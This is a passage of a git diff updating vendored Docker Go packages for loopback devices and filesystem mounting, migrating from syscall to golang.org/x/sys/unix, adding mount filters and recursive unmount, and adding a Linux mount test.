uintptr(unsafe.Pointer(loopInfo))); err != 0 { + if _, _, err := unix.Syscall(unix.SYS_IOCTL, loopFd, LoopGetStatus64, uintptr(unsafe.Pointer(loopInfo))); err != 0 { return nil, err } return loopInfo, nil } func ioctlLoopSetCapacity(loopFd uintptr, value int) error { - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopSetCapacity, uintptr(value)); err != 0 { - return err - } - return 
nil + return unix.IoctlSetInt(int(loopFd), LoopSetCapacity, value) } diff --git a/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go b/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go index e1100ce156..7206bfb950 100644 --- a/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go +++ b/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go @@ -1,6 +1,6 @@ -// +build linux +// +build linux,cgo -package loopback +package loopback // import "github.com/docker/docker/pkg/loopback" /* #include // FIXME: present only for defines, maybe we can remove it? diff --git a/vendor/github.com/docker/docker/pkg/loopback/loopback.go b/vendor/github.com/docker/docker/pkg/loopback/loopback.go index bc0479284c..086655bc1a 100644 --- a/vendor/github.com/docker/docker/pkg/loopback/loopback.go +++ b/vendor/github.com/docker/docker/pkg/loopback/loopback.go @@ -1,13 +1,13 @@ -// +build linux +// +build linux,cgo -package loopback +package loopback // import "github.com/docker/docker/pkg/loopback" import ( "fmt" "os" - "syscall" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) func getLoopbackBackingFile(file *os.File) (uint64, uint64, error) { @@ -31,12 +31,13 @@ func SetCapacity(file *os.File) error { // FindLoopDeviceFor returns a loopback device file for the specified file which // is backing file of a loop back device. 
func FindLoopDeviceFor(file *os.File) *os.File { - stat, err := file.Stat() + var stat unix.Stat_t + err := unix.Stat(file.Name(), &stat) if err != nil { return nil } - targetInode := stat.Sys().(*syscall.Stat_t).Ino - targetDevice := stat.Sys().(*syscall.Stat_t).Dev + targetInode := stat.Ino + targetDevice := stat.Dev for i := 0; true; i++ { path := fmt.Sprintf("/dev/loop%d", i) diff --git a/vendor/github.com/docker/docker/pkg/mount/flags.go b/vendor/github.com/docker/docker/pkg/mount/flags.go index 607dbed43a..272363b685 100644 --- a/vendor/github.com/docker/docker/pkg/mount/flags.go +++ b/vendor/github.com/docker/docker/pkg/mount/flags.go @@ -1,4 +1,4 @@ -package mount +package mount // import "github.com/docker/docker/pkg/mount" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go b/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go index f166cb2f77..ef35ef9059 100644 --- a/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go +++ b/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go @@ -1,6 +1,6 @@ // +build freebsd,cgo -package mount +package mount // import "github.com/docker/docker/pkg/mount" /* #include @@ -45,4 +45,5 @@ const ( RELATIME = 0 REMOUNT = 0 STRICTATIME = 0 + mntDetach = 0 ) diff --git a/vendor/github.com/docker/docker/pkg/mount/flags_linux.go b/vendor/github.com/docker/docker/pkg/mount/flags_linux.go index dc696dce90..a1b199a31a 100644 --- a/vendor/github.com/docker/docker/pkg/mount/flags_linux.go +++ b/vendor/github.com/docker/docker/pkg/mount/flags_linux.go @@ -1,85 +1,87 @@ -package mount +package mount // import "github.com/docker/docker/pkg/mount" import ( - "syscall" + "golang.org/x/sys/unix" ) const ( // RDONLY will mount the file system read-only. - RDONLY = syscall.MS_RDONLY + RDONLY = unix.MS_RDONLY // NOSUID will not allow set-user-identifier or set-group-identifier bits to // take effect. 
- NOSUID = syscall.MS_NOSUID + NOSUID = unix.MS_NOSUID // NODEV will not interpret character or block special devices on the file // system. - NODEV = syscall.MS_NODEV + NODEV = unix.MS_NODEV // NOEXEC will not allow execution of any binaries on the mounted file system. - NOEXEC = syscall.MS_NOEXEC + NOEXEC = unix.MS_NOEXEC // SYNCHRONOUS will allow I/O to the file system to be done synchronously. - SYNCHRONOUS = syscall.MS_SYNCHRONOUS + SYNCHRONOUS = unix.MS_SYNCHRONOUS // DIRSYNC will force all directory updates within the file system to be done // synchronously. This affects the following system calls: create, link, // unlink, symlink, mkdir, rmdir, mknod and rename. - DIRSYNC = syscall.MS_DIRSYNC + DIRSYNC = unix.MS_DIRSYNC // REMOUNT will attempt to remount an already-mounted file system. This is // commonly used to change the mount flags for a file system, especially to // make a readonly file system writeable. It does not change device or mount // point. - REMOUNT = syscall.MS_REMOUNT + REMOUNT = unix.MS_REMOUNT // MANDLOCK will force mandatory locks on a filesystem. - MANDLOCK = syscall.MS_MANDLOCK + MANDLOCK = unix.MS_MANDLOCK // NOATIME will not update the file access time when reading from a file. - NOATIME = syscall.MS_NOATIME + NOATIME = unix.MS_NOATIME // NODIRATIME will not update the directory access time. - NODIRATIME = syscall.MS_NODIRATIME + NODIRATIME = unix.MS_NODIRATIME // BIND remounts a subtree somewhere else. - BIND = syscall.MS_BIND + BIND = unix.MS_BIND // RBIND remounts a subtree and all possible submounts somewhere else. - RBIND = syscall.MS_BIND | syscall.MS_REC + RBIND = unix.MS_BIND | unix.MS_REC // UNBINDABLE creates a mount which cannot be cloned through a bind operation. - UNBINDABLE = syscall.MS_UNBINDABLE + UNBINDABLE = unix.MS_UNBINDABLE // RUNBINDABLE marks the entire mount tree as UNBINDABLE. 
- RUNBINDABLE = syscall.MS_UNBINDABLE | syscall.MS_REC + RUNBINDABLE = unix.MS_UNBINDABLE | unix.MS_REC // PRIVATE creates a mount which carries no propagation abilities. - PRIVATE = syscall.MS_PRIVATE + PRIVATE = unix.MS_PRIVATE // RPRIVATE marks the entire mount tree as PRIVATE. - RPRIVATE = syscall.MS_PRIVATE | syscall.MS_REC + RPRIVATE = unix.MS_PRIVATE | unix.MS_REC // SLAVE creates a mount which receives propagation from its master, but not // vice versa. - SLAVE = syscall.MS_SLAVE + SLAVE = unix.MS_SLAVE // RSLAVE marks the entire mount tree as SLAVE. - RSLAVE = syscall.MS_SLAVE | syscall.MS_REC + RSLAVE = unix.MS_SLAVE | unix.MS_REC // SHARED creates a mount which provides the ability to create mirrors of // that mount such that mounts and unmounts within any of the mirrors // propagate to the other mirrors. - SHARED = syscall.MS_SHARED + SHARED = unix.MS_SHARED // RSHARED marks the entire mount tree as SHARED. - RSHARED = syscall.MS_SHARED | syscall.MS_REC + RSHARED = unix.MS_SHARED | unix.MS_REC // RELATIME updates inode access times relative to modify or change time. - RELATIME = syscall.MS_RELATIME + RELATIME = unix.MS_RELATIME // STRICTATIME allows to explicitly request full atime updates. This makes // it possible for the kernel to default to relatime or noatime but still // allow userspace to override it. - STRICTATIME = syscall.MS_STRICTATIME + STRICTATIME = unix.MS_STRICTATIME + + mntDetach = unix.MNT_DETACH ) diff --git a/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go b/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go index 5564f7b3cd..cc6c475908 100644 --- a/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go @@ -1,6 +1,6 @@ -// +build !linux,!freebsd freebsd,!cgo solaris,!cgo +// +build !linux,!freebsd freebsd,!cgo -package mount +package mount // import "github.com/docker/docker/pkg/mount" // These flags are unsupported. 
const ( @@ -27,4 +27,5 @@ const ( STRICTATIME = 0 SYNCHRONOUS = 0 RDONLY = 0 + mntDetach = 0 ) diff --git a/vendor/github.com/docker/docker/pkg/mount/mount.go b/vendor/github.com/docker/docker/pkg/mount/mount.go index 66ac4bf472..874aff6545 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mount.go +++ b/vendor/github.com/docker/docker/pkg/mount/mount.go @@ -1,29 +1,66 @@ -package mount +package mount // import "github.com/docker/docker/pkg/mount" import ( - "time" + "sort" + "strings" + "syscall" + + "github.com/sirupsen/logrus" ) -// GetMounts retrieves a list of mounts for the current running process. -func GetMounts() ([]*Info, error) { - return parseMountTable() +// FilterFunc is a type defining a callback function +// to filter out unwanted entries. It takes a pointer +// to an Info struct (not fully populated, currently +// only Mountpoint is filled in), and returns two booleans: +// - skip: true if the entry should be skipped +// - stop: true if parsing should be stopped after the entry +type FilterFunc func(*Info) (skip, stop bool) + +// PrefixFilter discards all entries whose mount points +// do not start with a prefix specified +func PrefixFilter(prefix string) FilterFunc { + return func(m *Info) (bool, bool) { + skip := !strings.HasPrefix(m.Mountpoint, prefix) + return skip, false + } +} + +// SingleEntryFilter looks for a specific entry +func SingleEntryFilter(mp string) FilterFunc { + return func(m *Info) (bool, bool) { + if m.Mountpoint == mp { + return false, true // don't skip, stop now + } + return true, false // skip, keep going + } +} + +// ParentsFilter returns all entries whose mount points +// can be parents of a path specified, discarding others. +// For example, given `/var/lib/docker/something`, entries +// like `/var/lib/docker`, `/var` and `/` are returned. 
+func ParentsFilter(path string) FilterFunc { + return func(m *Info) (bool, bool) { + skip := !strings.HasPrefix(path, m.Mountpoint) + return skip, false + } +} + +// GetMounts retrieves a list of mounts for the current running process, +// with an optional filter applied (use nil for no filter). +func GetMounts(f FilterFunc) ([]*Info, error) { + return parseMountTable(f) } // Mounted determines if a specified mountpoint has been mounted. -// On Linux it looks at /proc/self/mountinfo and on Solaris at mnttab. +// On Linux it looks at /proc/self/mountinfo. func Mounted(mountpoint string) (bool, error) { - entries, err := parseMountTable() + entries, err := GetMounts(SingleEntryFilter(mountpoint)) if err != nil { return false, err } - // Search the table for the mountpoint - for _, e := range entries { - if e.Mountpoint == mountpoint { - return true, nil - } - } - return false, nil + return len(entries) > 0, nil } // Mount will mount filesystem according to the specified configuration, on the @@ -46,29 +83,59 @@ func Mount(device, target, mType, options string) error { // flags.go for supported option flags. func ForceMount(device, target, mType, options string) error { flag, data := parseOptions(options) - if err := mount(device, target, mType, uintptr(flag), data); err != nil { - return err - } - return nil + return mount(device, target, mType, uintptr(flag), data) } -// Unmount will unmount the target filesystem, so long as it is mounted. +// Unmount lazily unmounts a filesystem on supported platforms, otherwise +// does a normal unmount. func Unmount(target string) error { - if mounted, err := Mounted(target); err != nil || !mounted { - return err + err := unmount(target, mntDetach) + if err == syscall.EINVAL { + // ignore "not mounted" error + err = nil } - return ForceUnmount(target) + return err } -// ForceUnmount will force an unmount of the target filesystem, regardless if -// it is mounted or not. 
-func ForceUnmount(target string) (err error) { - // Simple retry logic for unmount - for i := 0; i < 10; i++ { - if err = unmount(target, 0); err == nil { - return nil +// RecursiveUnmount unmounts the target and all mounts underneath, starting with +// the deepsest mount first. +func RecursiveUnmount(target string) error { + mounts, err := parseMountTable(PrefixFilter(target)) + if err != nil { + return err + } + + // Make the deepest mount be first + sort.Slice(mounts, func(i, j int) bool { + return len(mounts[i].Mountpoint) > len(mounts[j].Mountpoint) + }) + + for i, m := range mounts { + logrus.Debugf("Trying to unmount %s", m.Mountpoint) + err = unmount(m.Mountpoint, mntDetach) + if err != nil { + // If the error is EINVAL either this whole package is wrong (invalid flags passed to unmount(2)) or this is + // not a mountpoint (which is ok in this case). + // Meanwhile calling `Mounted()` is very expensive. + // + // We've purposefully used `syscall.EINVAL` here instead of `unix.EINVAL` to avoid platform branching + // Since `EINVAL` is defined for both Windows and Linux in the `syscall` package (and other platforms), + // this is nicer than defining a custom value that we can refer to in each platform file. 
+ if err == syscall.EINVAL { + continue + } + if i == len(mounts)-1 { + if mounted, e := Mounted(m.Mountpoint); e != nil || mounted { + return err + } + continue + } + // This is some submount, we can ignore this error for now, the final unmount will fail if this is a real problem + logrus.WithError(err).Warnf("Failed to unmount submount %s", m.Mountpoint) + continue } - time.Sleep(100 * time.Millisecond) + + logrus.Debugf("Unmounted %s", m.Mountpoint) } - return + return nil } diff --git a/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go b/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go index 253aff3b8e..befff9d50c 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go @@ -1,6 +1,6 @@ -// +build !windows,!solaris +// +build !windows -package mount +package mount // import "github.com/docker/docker/pkg/mount" import ( "os" @@ -25,6 +25,10 @@ func TestMountOptionsParsing(t *testing.T) { } func TestMounted(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") + } + tmp := path.Join(os.TempDir(), "mount-tests") if err := os.MkdirAll(tmp, 0777); err != nil { t.Fatal(err) @@ -76,6 +80,10 @@ func TestMounted(t *testing.T) { } func TestMountReadonly(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") + } + tmp := path.Join(os.TempDir(), "mount-tests") if err := os.MkdirAll(tmp, 0777); err != nil { t.Fatal(err) @@ -121,7 +129,7 @@ func TestMountReadonly(t *testing.T) { } func TestGetMounts(t *testing.T) { - mounts, err := GetMounts() + mounts, err := GetMounts(nil) if err != nil { t.Fatal(err) } diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go b/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go index bb870e6f59..b6ab83a230 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go +++ b/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go @@ -1,4 +1,4 @@ -package mount +package 
mount // import "github.com/docker/docker/pkg/mount" /* #include @@ -13,8 +13,9 @@ import "C" import ( "fmt" "strings" - "syscall" "unsafe" + + "golang.org/x/sys/unix" ) func allocateIOVecs(options []string) []C.struct_iovec { @@ -55,5 +56,5 @@ func mount(device, target, mType string, flag uintptr, data string) error { } func unmount(target string, flag int) error { - return syscall.Unmount(target, flag) + return unix.Unmount(target, flag) } diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go b/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go index dd4280c777..631daf10a5 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go +++ b/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go @@ -1,21 +1,57 @@ -package mount +package mount // import "github.com/docker/docker/pkg/mount" import ( - "syscall" + "golang.org/x/sys/unix" ) -func mount(device, target, mType string, flag uintptr, data string) error { - if err := syscall.Mount(device, target, mType, flag, data); err != nil { - return err +const ( + // ptypes is the set propagation types. + ptypes = unix.MS_SHARED | unix.MS_PRIVATE | unix.MS_SLAVE | unix.MS_UNBINDABLE + + // pflags is the full set valid flags for a change propagation call. + pflags = ptypes | unix.MS_REC | unix.MS_SILENT + + // broflags is the combination of bind and read only + broflags = unix.MS_BIND | unix.MS_RDONLY +) + +// isremount returns true if either device name or flags identify a remount request, false otherwise. +func isremount(device string, flags uintptr) bool { + switch { + // We treat device "" and "none" as a remount request to provide compatibility with + // requests that don't explicitly set MS_REMOUNT such as those manipulating bind mounts. 
+ case flags&unix.MS_REMOUNT != 0, device == "", device == "none": + return true + default: + return false + } +} + +func mount(device, target, mType string, flags uintptr, data string) error { + oflags := flags &^ ptypes + if !isremount(device, flags) || data != "" { + // Initial call applying all non-propagation flags for mount + // or remount with changed data + if err := unix.Mount(device, target, mType, oflags, data); err != nil { + return err + } } - // If we have a bind mount or remount, remount... - if flag&syscall.MS_BIND == syscall.MS_BIND && flag&syscall.MS_RDONLY == syscall.MS_RDONLY { - return syscall.Mount(device, target, mType, flag|syscall.MS_REMOUNT, data) + if flags&ptypes != 0 { + // Change the propagation type. + if err := unix.Mount("", target, "", flags&pflags, ""); err != nil { + return err + } } + + if oflags&broflags == broflags { + // Remount the bind to apply read only. + return unix.Mount("", target, "", oflags|unix.MS_REMOUNT, "") + } + return nil } func unmount(target string, flag int) error { - return syscall.Unmount(target, flag) + return unix.Unmount(target, flag) } diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_linux_test.go b/vendor/github.com/docker/docker/pkg/mount/mounter_linux_test.go new file mode 100644 index 0000000000..336f3d5cdc --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mounter_linux_test.go @@ -0,0 +1,228 @@ +// +build linux + +package mount // import "github.com/docker/docker/pkg/mount" + +import ( + "fmt" + "io/ioutil" + "os" + "strings" + "testing" +) + +func TestMount(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") + } + + source, err := ioutil.TempDir("", "mount-test-source-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(source) + + // Ensure we have a known start point by mounting tmpfs with given options + if err := Mount("tmpfs", source, "tmpfs", "private"); err != nil { + t.Fatal(err) + } + defer ensureUnmount(t, source) + validateMount(t, 
source, "", "", "") + if t.Failed() { + t.FailNow() + } + + target, err := ioutil.TempDir("", "mount-test-target-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(target) + + tests := []struct { + source string + ftype string + options string + expectedOpts string + expectedOptional string + expectedVFS string + }{ + // No options + {"tmpfs", "tmpfs", "", "", "", ""}, + // Default rw / ro test + {source, "", "bind", "", "", ""}, + {source, "", "bind,private", "", "", ""}, + {source, "", "bind,shared", "", "shared", ""}, + {source, "", "bind,slave", "", "master", ""}, + {source, "", "bind,unbindable", "", "unbindable", ""}, + // Read Write tests + {source, "", "bind,rw", "rw", "", ""}, + {source, "", "bind,rw,private", "rw", "", ""}, + {source, "", "bind,rw,shared", "rw", "shared", ""}, + {source, "", "bind,rw,slave", "rw", "master", ""}, + {source, "", "bind,rw,unbindable", "rw", "unbindable", ""}, + // Read Only tests + {source, "", "bind,ro", "ro", "", ""}, + {source, "", "bind,ro,private", "ro", "", ""}, + {source, "", "bind,ro,shared", "ro", "shared", ""}, + {source, "", "bind,ro,slave", "ro", "master", ""}, + {source, "", "bind,ro,unbindable", "ro", "unbindable", ""}, + // Remount tests to change per filesystem options + {"", "", "remount,size=128k", "rw", "", "rw,size=128k"}, + {"", "", "remount,ro,size=128k", "ro", "", "ro,size=128k"}, + } + + for _, tc := range tests { + ftype, options := tc.ftype, tc.options + if tc.ftype == "" { + ftype = "none" + } + if tc.options == "" { + options = "none" + } + + t.Run(fmt.Sprintf("%v-%v", ftype, options), func(t *testing.T) { + if strings.Contains(tc.options, "slave") { + // Slave requires a shared source + if err := MakeShared(source); err != nil { + t.Fatal(err) + } + defer func() { + if err := MakePrivate(source); err != nil { + t.Fatal(err) + } + }() + } + if strings.Contains(tc.options, "remount") { + // create a new mount to remount first + if err := Mount("tmpfs", target, "tmpfs", ""); err != nil { + 
t.Fatal(err) + } + } + if err := Mount(tc.source, target, tc.ftype, tc.options); err != nil { + t.Fatal(err) + } + defer ensureUnmount(t, target) + validateMount(t, target, tc.expectedOpts, tc.expectedOptional, tc.expectedVFS) + }) + } +} + +// ensureUnmount umounts mnt checking for errors +func ensureUnmount(t *testing.T, mnt string) { + if err := Unmount(mnt); err != nil { + t.Error(err) + } +} + +// validateMount checks that mnt has the given options +func validateMount(t *testing.T, mnt string, opts, optional, vfs string) { + info, err := GetMounts(nil) + if err != nil { + t.Fatal(err) + } + + wantedOpts := make(map[string]struct{}) + if opts != "" { + for _, opt := range strings.Split(opts, ",") { + wantedOpts[opt] = struct{}{} + } + } + + wantedOptional := make(map[string]struct{}) + if optional != "" { + for _, opt := range strings.Split(optional, ",") { + wantedOptional[opt] = struct{}{} + } + } + + wantedVFS := make(map[string]struct{}) + if vfs != "" { + for _, opt := range strings.Split(vfs, ",") { + wantedVFS[opt] = struct{}{} + } + } + + mnts := make(map[int]*Info, len(info)) + for _, mi := range info { + mnts[mi.ID] = mi + } + + for _, mi := range info { + if mi.Mountpoint != mnt { + continue + } + + // Use parent info as the defaults + p := mnts[mi.Parent] + pOpts := make(map[string]struct{}) + if p.Opts != "" { + for _, opt := range strings.Split(p.Opts, ",") { + pOpts[clean(opt)] = struct{}{} + } + } + pOptional := make(map[string]struct{}) + if p.Optional != "" { + for _, field := range strings.Split(p.Optional, ",") { + pOptional[clean(field)] = struct{}{} + } + } + + // Validate Opts + if mi.Opts != "" { + for _, opt := range strings.Split(mi.Opts, ",") { + opt = clean(opt) + if !has(wantedOpts, opt) && !has(pOpts, opt) { + t.Errorf("unexpected mount option %q, expected %q", opt, opts) + } + delete(wantedOpts, opt) + } + } + for opt := range wantedOpts { + t.Errorf("missing mount option %q, found %q", opt, mi.Opts) + } + + // Validate Optional + 
if mi.Optional != "" { + for _, field := range strings.Split(mi.Optional, ",") { + field = clean(field) + if !has(wantedOptional, field) && !has(pOptional, field) { + t.Errorf("unexpected optional field %q, expected %q", field, optional) + } + delete(wantedOptional, field) + } + } + for field := range wantedOptional { + t.Errorf("missing optional field %q, found %q", field, mi.Optional) + } + + // Validate VFS if set + if vfs != "" { + if mi.VfsOpts != "" { + for _, opt := range strings.Split(mi.VfsOpts, ",") { + opt = clean(opt) + if !has(wantedVFS, opt) && opt != "seclabel" { // can be added by selinux + t.Errorf("unexpected vfs option %q, expected %q", opt, vfs) + } + delete(wantedVFS, opt) + } + } + for opt := range wantedVFS { + t.Errorf("missing vfs option %q, found %q", opt, mi.VfsOpts) + } + } + + return + } + + t.Errorf("failed to find mount %q", mnt) +} + +// clean strips off any value param after the colon +func clean(v string) string { + return strings.SplitN(v, ":", 2)[0] +} + +// has returns true if key is a member of m +func has(m map[string]struct{}, key string) bool { + _, ok := m[key] + return ok +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go b/vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go deleted file mode 100644 index c684aa81fc..0000000000 --- a/vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go +++ /dev/null @@ -1,33 +0,0 @@ -// +build solaris,cgo - -package mount - -import ( - "golang.org/x/sys/unix" - "unsafe" -) - -// #include -// #include -// #include -// int Mount(const char *spec, const char *dir, int mflag, -// char *fstype, char *dataptr, int datalen, char *optptr, int optlen) { -// return mount(spec, dir, mflag, fstype, dataptr, datalen, optptr, optlen); -// } -import "C" - -func mount(device, target, mType string, flag uintptr, data string) error { - spec := C.CString(device) - dir := C.CString(target) - fstype := C.CString(mType) - _, err := C.Mount(spec, dir, C.int(flag), 
fstype, nil, 0, nil, 0) - C.free(unsafe.Pointer(spec)) - C.free(unsafe.Pointer(dir)) - C.free(unsafe.Pointer(fstype)) - return err -} - -func unmount(target string, flag int) error { - err := unix.Unmount(target, flag) - return err -} diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go b/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go index a2a3bb457f..1428dffa52 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go @@ -1,6 +1,6 @@ -// +build !linux,!freebsd,!solaris freebsd,!cgo solaris,!cgo +// +build !linux,!freebsd freebsd,!cgo -package mount +package mount // import "github.com/docker/docker/pkg/mount" func mount(device, target, mType string, flag uintptr, data string) error { panic("Not implemented") diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo.go index e3fc3535e9..ecd03fc022 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mountinfo.go +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo.go @@ -1,4 +1,4 @@ -package mount +package mount // import "github.com/docker/docker/pkg/mount" // Info reveals information about a particular mounted filesystem. This // struct is populated from the content in the /proc//mountinfo file. diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go index 4f32edcd90..36c89dc1a2 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go @@ -1,4 +1,4 @@ -package mount +package mount // import "github.com/docker/docker/pkg/mount" /* #include @@ -15,7 +15,7 @@ import ( // Parse /proc/self/mountinfo because comparing Dev and ino does not work from // bind mounts. 
-func parseMountTable() ([]*Info, error) { +func parseMountTable(filter FilterFunc) ([]*Info, error) { var rawEntries *C.struct_statfs count := int(C.getmntinfo(&rawEntries, C.MNT_WAIT)) @@ -32,10 +32,24 @@ func parseMountTable() ([]*Info, error) { var out []*Info for _, entry := range entries { var mountinfo Info + var skip, stop bool mountinfo.Mountpoint = C.GoString(&entry.f_mntonname[0]) + + if filter != nil { + // filter out entries we're not interested in + skip, stop = filter(p) + if skip { + continue + } + } + mountinfo.Source = C.GoString(&entry.f_mntfromname[0]) mountinfo.Fstype = C.GoString(&entry.f_fstypename[0]) + out = append(out, &mountinfo) + if stop { + break + } } return out, nil } diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go index be69fee1d7..c1dba01fc3 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go @@ -1,86 +1,123 @@ -// +build linux - -package mount +package mount // import "github.com/docker/docker/pkg/mount" import ( "bufio" "fmt" "io" "os" + "strconv" "strings" ) -const ( - /* 36 35 98:0 /mnt1 /mnt2 rw,noatime master:1 - ext3 /dev/root rw,errors=continue - (1)(2)(3) (4) (5) (6) (7) (8) (9) (10) (11) +func parseInfoFile(r io.Reader, filter FilterFunc) ([]*Info, error) { + s := bufio.NewScanner(r) + out := []*Info{} + for s.Scan() { + if err := s.Err(); err != nil { + return nil, err + } + /* + 36 35 98:0 /mnt1 /mnt2 rw,noatime master:1 - ext3 /dev/root rw,errors=continue + (1)(2)(3) (4) (5) (6) (7) (8) (9) (10) (11) - (1) mount ID: unique identifier of the mount (may be reused after umount) - (2) parent ID: ID of parent (or of self for the top of the mount tree) - (3) major:minor: value of st_dev for files on filesystem - (4) root: root of the mount within the filesystem - (5) mount point: mount point relative to the process's root - (6) mount options: per 
mount options - (7) optional fields: zero or more fields of the form "tag[:value]" - (8) separator: marks the end of the optional fields - (9) filesystem type: name of filesystem of the form "type[.subtype]" - (10) mount source: filesystem specific information or "none" - (11) super options: per super block options*/ - mountinfoFormat = "%d %d %d:%d %s %s %s %s" -) + (1) mount ID: unique identifier of the mount (may be reused after umount) + (2) parent ID: ID of parent (or of self for the top of the mount tree) + (3) major:minor: value of st_dev for files on filesystem + (4) root: root of the mount within the filesystem + (5) mount point: mount point relative to the process's root + (6) mount options: per mount options + (7) optional fields: zero or more fields of the form "tag[:value]" + (8) separator: marks the end of the optional fields + (9) filesystem type: name of filesystem of the form "type[.subtype]" + (10) mount source: filesystem specific information or "none" + (11) super options: per super block options + */ -// Parse /proc/self/mountinfo because comparing Dev and ino does not work from -// bind mounts -func parseMountTable() ([]*Info, error) { - f, err := os.Open("/proc/self/mountinfo") - if err != nil { - return nil, err - } - defer f.Close() + text := s.Text() + fields := strings.Split(text, " ") + numFields := len(fields) + if numFields < 10 { + // should be at least 10 fields + return nil, fmt.Errorf("Parsing '%s' failed: not enough fields (%d)", text, numFields) + } - return parseInfoFile(f) -} + p := &Info{} + // ignore any numbers parsing errors, as there should not be any + p.ID, _ = strconv.Atoi(fields[0]) + p.Parent, _ = strconv.Atoi(fields[1]) + mm := strings.Split(fields[2], ":") + if len(mm) != 2 { + return nil, fmt.Errorf("Parsing '%s' failed: unexpected minor:major pair %s", text, mm) + } + p.Major, _ = strconv.Atoi(mm[0]) + p.Minor, _ = strconv.Atoi(mm[1]) -func parseInfoFile(r io.Reader) ([]*Info, error) { - var ( - s = 
bufio.NewScanner(r) - out = []*Info{} - ) + p.Root = fields[3] + p.Mountpoint = fields[4] + p.Opts = fields[5] - for s.Scan() { - if err := s.Err(); err != nil { - return nil, err + var skip, stop bool + if filter != nil { + // filter out entries we're not interested in + skip, stop = filter(p) + if skip { + continue + } } - var ( - p = &Info{} - text = s.Text() - optionalFields string - ) - - if _, err := fmt.Sscanf(text, mountinfoFormat, - &p.ID, &p.Parent, &p.Major, &p.Minor, - &p.Root, &p.Mountpoint, &p.Opts, &optionalFields); err != nil { - return nil, fmt.Errorf("Scanning '%s' failed: %s", text, err) + // one or more optional fields, when a separator (-) + i := 6 + for ; i < numFields && fields[i] != "-"; i++ { + switch i { + case 6: + p.Optional = fields[6] + default: + /* NOTE there might be more optional fields before the such as + fields[7]...fields[N] (where N < sepIndex), although + as of Linux kernel 4.15 the only known ones are + mount propagation flags in fields[6]. The correct + behavior is to ignore any unknown optional fields. + */ + break + } } - // Safe as mountinfo encodes mountpoints with spaces as \040. - index := strings.Index(text, " - ") - postSeparatorFields := strings.Fields(text[index+3:]) - if len(postSeparatorFields) < 3 { - return nil, fmt.Errorf("Error found less than 3 fields post '-' in %q", text) + if i == numFields { + return nil, fmt.Errorf("Parsing '%s' failed: missing separator ('-')", text) } - if optionalFields != "-" { - p.Optional = optionalFields + // There should be 3 fields after the separator... + if i+4 > numFields { + return nil, fmt.Errorf("Parsing '%s' failed: not enough fields after a separator", text) } + // ... but in Linux <= 3.9 mounting a cifs with spaces in a share name + // (like "//serv/My Documents") _may_ end up having a space in the last field + // of mountinfo (like "unc=//serv/My Documents"). Since kernel 3.10-rc1, cifs + // option unc= is ignored, so a space should not appear. 
